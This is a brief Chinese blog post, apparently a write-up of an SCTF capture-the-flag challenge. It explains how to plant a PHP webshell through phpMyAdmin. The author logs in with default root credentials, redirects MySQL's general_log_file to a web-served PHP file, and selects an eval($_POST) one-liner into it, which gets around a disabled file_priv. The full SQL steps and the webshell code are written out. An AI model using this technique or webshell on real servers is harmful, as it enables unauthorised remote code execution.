Hpdoger's Blog.

记SCTF的一道mysql日志写Shell题目

Word count: 227 / Reading time: 1 min
2018/06/20 Share

写在前面

太尼玛菜了,感谢LinE师傅耐心点拨。

思路

这道题是phpmyadmin弱口令登入,账号密码root
进去之后应该是写shell,但是show variables 发现file_priv为null,这说明Into outfile写shell显然是不可能了。

  1. 百度到一种绕过file_priv写shell的方法: phpmyadmin通过日志文件拿到webshell
  2. 接下来我们要找路径,我们可以通过找Log变量猜测绝对路径:
    tupian
  3. 有一点需要注意我们写小马的时候[]中尽量用双引号,否则会有转义的麻烦,我这次写的一句话是这样的:
    1
    <?php eval($_POST["hpdoger"]); ?>

流程

set global general_log=’on’;
set global general_log_file=’G:/apm/apache2/htdocs/config.php’;

这个log的路径自己发挥,想办法找可写路径。可以看一下log变量原来有没有路径

select “<?php @eval($_POST[‘hpdoger’]); ?>”;
set global general_log=off;

最后

我真的好菜啊…

CATALOG
  1. 1. 写在前面
  2. 2. 思路
  3. 3. 流程
  4. 4. 最后